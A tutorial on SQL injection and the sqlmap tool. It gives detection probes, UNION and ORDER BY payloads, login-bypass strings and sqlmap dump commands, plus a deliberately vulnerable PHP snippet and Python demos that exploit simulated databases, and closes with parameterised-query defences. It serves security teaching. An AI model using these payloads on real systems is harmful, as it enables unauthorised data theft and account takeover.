A quick tutorial to SQL injection with the tool SQLmap
A SQL injection attack consists of two steps:
- Find a webpage vulnerable to SQL injections
- Exploit the vulnerable webpage with SQL injection
Find vulnerability
A webpage URL such as /product.php?id=1
generates a query like
SELECT * FROM products WHERE id=1
To test whether the page is vulnerable, a single quote ' is appended to the parameter: /product.php?id=1'
This produces a malformed SQL query
SELECT * FROM products WHERE id=1'
If the page now shows some kind of error message, the parameter reaches the database unescaped and the page is very likely vulnerable. If the page looks the same or is not found, the test is inconclusive rather than proof of safety: many applications hide database errors (blind SQL injection), and then differences in page content or response time have to be used instead. When the parameter is embedded in a quoted string (id='1'), an odd number of appended single quotes breaks the query while an even number leaves it valid, because each pair of quotes is parsed as one escaped quote; that difference helps tell a genuine SQL error from a generic error page. The beginning of the SQL query cannot be modified, since it is fixed by the PHP source code running on the server; only the text following the injected parameter is under the attacker's control.
PHP code (deliberately vulnerable; the mysql_* functions have been removed since PHP 7.0, but concatenating a parameter into the query text is just as dangerous with mysqli or PDO):
<?php
// The GET parameter is concatenated straight into the SQL text: this is the injection point.
$id = $_GET["id"];
$result = mysql_query("SELECT * FROM products WHERE id=" . $id);
$row = mysql_fetch_assoc($result);
It is often also possible to comment out the rest of the SQL query by appending ' -- (MySQL requires a space or other whitespace after --), so that
SELECT * FROM products WHERE month='sept' and id=1
becomes, for the input sept' --
SELECT * FROM products WHERE month='sept' --' and id=1
where the last condition, on the id number, is commented out.
Exploit vulnerability
The number of columns returned by the query is determined by appending an ORDER BY n clause, where n is the position of the column used for sorting. Start with n = 1 and increase it until the page returns an error, which means no column with that position exists (the spaces in the URLs below are sent URL-encoded by the browser).
http://www.website.com/index.php?id=1 order by 1
http://www.website.com/index.php?id=1 order by 2
http://www.website.com/index.php?id=1 order by 3
http://www.website.com/index.php?id=1 order by 4
When the last statement produces an error, the query returns 3 columns. If the parameter is enclosed in quotes in the original query, the quote has to be closed first and the remainder of the original query commented out (the trailing - keeps the required space after -- from being stripped from the URL); in that case try
http://www.website.com/index.php?id=1' order by 1-- -
http://www.website.com/index.php?id=1' order by 2-- -
http://www.website.com/index.php?id=1' order by 3-- -
http://www.website.com/index.php?id=1' order by 4-- -
Another way to determine the number of columns is to append UNION SELECT null, null, ..., null FROM dual
with a growing number of nulls, starting at 1 and increasing until no error is thrown. A UNION requires both SELECT statements to return the same number of columns with compatible types, which is why NULL (compatible with any type) is used as the placeholder. FROM dual is required on Oracle; MySQL accepts it as well.
The column(s) whose value is reflected in the page are found by appending union select 1,2,3, where 1,2,3 are markers for the column positions found previously. The id is set to a value that matches no row (here -1) so that only the row produced by the injected SELECT is rendered; everything after -- is a comment, so the trailing order by 1 in the URLs below is ignored and merely guarantees that the comment marker is followed by a space:
http://www.website.com/index.php?id=-1 union select 1,2,3-- order by 1
Assuming column 2 is reflected, that marker is replaced by version(), database() or user() to read the DBMS version, the current database name and the database user the application connects as:
http://www.website.com/index.php?id=-1 union select 1,version(),3-- order by 1
http://www.website.com/index.php?id=-1 union select 1,database(),3-- order by 1
http://www.website.com/index.php?id=-1 union select 1,user(),3-- order by 1
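The detection and exploitation steps above, carried out end to end as an added example (not code from the original page). The target is simulated with Python's built-in sqlite3 module and an in-memory database with constructed sample rows; the vulnerable_page() function repeats the mistake of the PHP snippet (concatenating the id into the query). SQLite stands in for MySQL, so sqlite_version() plays the role of version(), and the final step reads a password from a constructed users table in place of database() or user(). All function names, table contents and the max_cols limit are assumptions of this example.

```python
import sqlite3

# Constructed sample data standing in for the tutorial's products table,
# plus a second table holding the kind of data an attacker is after.
PRODUCTS = [(1, "apple", 1.50), (2, "pear", 2.00), (3, "plum", 0.75)]
USERS = [(1, "admin", "s3cret")]


def setup_db():
    """In-memory SQLite database playing the role of the PHP page's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def vulnerable_page(conn, id_param):
    """Same flaw as the PHP snippet: the id parameter is concatenated into the query text."""
    query = "SELECT * FROM products WHERE id=" + id_param
    return conn.execute(query).fetchall()


def is_injectable(conn, id_param="1"):
    """Single-quote probe: the clean value works but the value with a trailing ' errors out."""
    try:
        vulnerable_page(conn, id_param)
    except sqlite3.Error:
        return False          # baseline request already fails; nothing can be concluded
    try:
        vulnerable_page(conn, id_param + "'")
    except sqlite3.Error:
        return True           # the quote reached the SQL parser unescaped
    return False


def count_columns(conn, max_cols=20):
    """ORDER BY n probe: the first n that errors is one past the number of columns."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_page(conn, f"1 ORDER BY {n}")
        except sqlite3.Error:
            return n - 1
    return None


def reflected_columns(conn, ncols):
    """Negate the id so only the injected UNION row comes back, then see which markers appear."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = vulnerable_page(conn, f"-1 UNION SELECT {markers}")
    shown = {str(v) for v in rows[0]}
    return [i for i in range(1, ncols + 1) if str(i) in shown]


def extract(conn, ncols, column, expression):
    """Put an expression in a reflected column; on MySQL this is where version(), database() or user() goes."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[column - 1] = expression
    rows = vulnerable_page(conn, f"-1 UNION SELECT {','.join(cols)}")
    return rows[0][column - 1]


if __name__ == "__main__":
    db = setup_db()
    print("injectable:", is_injectable(db))
    n = count_columns(db)
    print("columns:", n, "reflected:", reflected_columns(db, n))
    print("version:", extract(db, n, 2, "sqlite_version()"))
    print("admin password:", extract(db, n, 2, "(SELECT password FROM users WHERE username='admin')"))
```

Because the products query selects three columns and all three are rendered, every marker is reflected here; on a real page the HTML template typically displays only some of them, and extract() has to target one of those.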
Another classic malicious input is the username admin' -- entered in a login form, which turns the login statement into
SELECT * FROM users WHERE username = 'admin'--' AND password = 'password'
Other SQL injection payloads (# and /* are alternative comment markers, # being MySQL-specific; the variants with a closing parenthesis are for parameters that sit inside parentheses in the original query):
admin' #
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1--
') OR ('1'='1--
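The login bypass above, as an added example that is not part of the original page. A constructed users table in an in-memory SQLite database stands in for the login backend, and vulnerable_login() builds the statement by concatenation exactly as shown. Only the -- payloads are exercised because # is not a comment marker in SQLite; the function and table names are assumptions of this example.

```python
import sqlite3


def setup_users():
    """Constructed users table standing in for the login backend of the statement above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "correct horse"), ("bob", "hunter2")])
    return conn


def vulnerable_login(conn, username, password):
    """Builds the login statement by string concatenation, as in the statement above.

    Returns the username of the first matching row (the account the user ends up
    logged in as), or None when no row matches.
    """
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_users()
    for user, pw in [("bob", "hunter2"), ("bob", "wrong"),
                     ("admin' --", "anything"), ("' OR 1=1--", "anything")]:
        print(repr(user), "->", vulnerable_login(db, user, pw))
```

admin' -- comments out the password check and logs in as admin; ' OR 1=1-- matches every row, so the application picks the first one, which on most schemas is the first (often administrative) account.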
SQLMap
SQL injection is the manipulation of a SQL query through user-supplied parameters that a webpage passes into a database query. SQLmap is an open-source tool written in Python that automates SQL injection, which is very tedious to do by hand. It is the most widely used tool for exploiting websites vulnerable to SQL injection: it runs attacker-chosen SQL statements against the website's database and extracts its contents. Data in the database can be read and modified and, depending on the database's configuration and the privileges of the database account, operating-system commands can be executed on the database server. Other tools that exploit SQL injection vulnerabilities are Havij and Pangolin.
To exploit a SQL injection vulnerability with SQLmap, the following steps are taken:
- Install SQLmap from https://sqlmap.org/ (the project is hosted on GitHub, see the links below) if it is not already installed; it ships by default in Kali Linux
- Find a vulnerable webpage URL like the one below
Vulnerable webpages usually look like a domain name followed by something like /listproducts.php?cat=1
which produces a query like SELECT * FROM products WHERE cat=1
To test whether the page is vulnerable, a single quote ' is appended to the parameter: /listproducts.php?cat=1'
If some kind of error is shown, the page is vulnerable. If the page looks the same or is not found, the manual test is inconclusive; SQLmap additionally tests for boolean-based and time-based blind injection, where no error is ever displayed.
Exploiting a vulnerable website
Start a terminal and enter the command line:
sqlmap -u url --options
where url is the address of a vulnerable webpage (quote it in the shell, because ? and & are special characters) and --options is one or more of the options below:
--dbs
Enumerate the list of databases
--tables
Enumerate the list of tables (select the database with -D database)
--columns
Enumerate the list of columns (select the table with -D database -T table)
--count
Count the number of entries in the table
--users
Enumerate the database users
--passwords
Enumerate the database users' password hashes and attempt to crack them with a dictionary attack
--roles
Enumerate the database users' roles
--privileges
Enumerate the database users' privileges
--dump
Dump the entries of a table (select with -D database -T table and, optionally, -C column1,column2)
--batch
Accept the default answer to every question SQLmap asks, for unattended runs
sqlmap -h
Show help
Example
Below is a simple example of SQL injection against the intentionally vulnerable target webpage http://testphp.vulnweb.com/listproducts.php?cat=1
Get the list of all the databases on the target:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
Get the list of all the tables in database acuart:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
Get the list of all the columns in table products in database acuart:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T products --columns
Show all entries of columns id, name, price in table products in database acuart:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T products -C id,name,price --dump
Cracking
It is unlikely that passwords are stored in plaintext in the database. When password hashes are retrieved instead, they can be attacked offline with a password-cracking tool such as John the Ripper (SQLmap's --passwords option also runs a basic dictionary attack on the database users' hashes). Short and simple passwords are broken quickly.
Countermeasure
The countermeasure against SQL injection is to keep user input out of the SQL syntax. Use parameterised queries (prepared statements), so that values are bound by the database driver instead of being concatenated into the query text, and validate client input on the server, preferably against a list of allowed values (an allowlist), which is the only option for parts of a statement that cannot be bound as parameters, such as a column name in an ORDER BY clause.
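The hardened counterpart of the vulnerable product lookup, as an added example that is not part of the original page: parameter binding with ? placeholders for values, integer validation for the id, and an allowlist for a sort column that cannot be bound. It uses Python's built-in sqlite3 module with a constructed products table; the function names and the ALLOWED_SORT_COLUMNS list are assumptions of this example.

```python
import sqlite3

# Identifiers (column names) cannot be bound as parameters, so the sort column
# is checked against a fixed allowlist before it is spliced into the statement.
ALLOWED_SORT_COLUMNS = ("id", "name", "price")


def setup_db():
    """Constructed products table for the examples below."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "apple", 1.50), (2, "pear", 2.00), (3, "plum", 0.75)])
    return conn


def product_by_id(conn, id_param):
    """Hardened version of the PHP page: validate the type, then bind the value."""
    try:
        product_id = int(id_param)      # "1" passes; "1'" and "-1 UNION SELECT ..." do not
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT * FROM products WHERE id = ?", (product_id,)).fetchall()


def product_by_name(conn, name):
    """A string parameter bound with ?: quotes and comment markers are just characters."""
    return conn.execute("SELECT * FROM products WHERE name = ?", (name,)).fetchall()


def products_sorted(conn, sort_column):
    """Allowlist check for the one part of the statement that cannot be a bound parameter."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unexpected sort column: {sort_column!r}")
    return conn.execute(f"SELECT * FROM products ORDER BY {sort_column}").fetchall()


if __name__ == "__main__":
    db = setup_db()
    print(product_by_id(db, "1"))
    print(product_by_name(db, "' OR 1=1--"))     # no row is named that, so nothing comes back
    print(products_sorted(db, "price"))
    for bad in ("1'", "-1 UNION SELECT 1,2,3"):
        try:
            product_by_id(db, bad)
        except ValueError as err:
            print(repr(bad), "rejected:", err)
```

The payloads that worked against the vulnerable page are either rejected before any SQL is built or end up compared literally against the column, so ' OR 1=1-- simply matches no product name.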
MySQL has the default databases information_schema and mysql. The information_schema database describes all other databases, tables and columns on the server, which is what makes enumeration possible:
SELECT table_name FROM information_schema.tables
SELECT column_name FROM information_schema.columns
Queries that SQLmap executes automatically when enumerating databases (the IFNULL and CAST wrappers turn NULL into a space and force a text result, so that every value can be reflected through the same column; the LIMIT offset is increased by one for each further database):
Fetching number of databases
SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(1000)), CHAR(32)) FROM information_schema.SCHEMATA
Retrieve the first database
SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(1000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1
Retrieve the second database
SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(1000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1
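The count-then-LIMIT enumeration pattern of the queries above, driven through a UNION injection, as an added example that is not part of the original page. SQLite's built-in sqlite_master catalogue stands in for information_schema.SCHEMATA (name for schema_name, CAST AS TEXT for CHAR(1000)); the IFNULL(..., CHAR(32)) wrapping is kept, and an ORDER BY is added so the offsets are stable. The two-table schema, the vulnerable_page() query and the function names are constructed assumptions of this example.

```python
import sqlite3


def setup_db():
    """Constructed schema with two tables, so there is something to enumerate."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'apple')")
    return conn


def vulnerable_page(conn, id_param):
    """Two-column query with the id concatenated in, as in the PHP snippet earlier."""
    return conn.execute("SELECT id, name FROM products WHERE id=" + id_param).fetchall()


def union_extract(conn, scalar_query):
    """Reflect the result of a scalar subquery through the second (name) column."""
    rows = vulnerable_page(conn, f"-1 UNION SELECT 1,({scalar_query})")
    return rows[0][1]


def enumerate_tables(conn):
    """sqlmap's pattern: fetch the count first, then one name per request via LIMIT offset, 1."""
    count = int(union_extract(conn,
        "SELECT IFNULL(CAST(COUNT(DISTINCT(name)) AS TEXT), CHAR(32)) "
        "FROM sqlite_master WHERE type='table'"))
    names = []
    for offset in range(count):
        names.append(union_extract(conn,
            "SELECT DISTINCT(IFNULL(CAST(name AS TEXT), CHAR(32))) "
            f"FROM sqlite_master WHERE type='table' ORDER BY 1 LIMIT {offset}, 1"))
    return names


if __name__ == "__main__":
    print(enumerate_tables(setup_db()))
```

Each table name costs one request, which is why SQLmap asks for the count first: it knows exactly how many LIMIT offsets to walk and when to stop.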
Useful links
- https://github.com/sqlmapproject/sqlmap/wiki/Usage
- http://testphp.vulnweb.com/listproducts.php?cat=1 Intentionally vulnerable website for practising SQL injection with sqlmap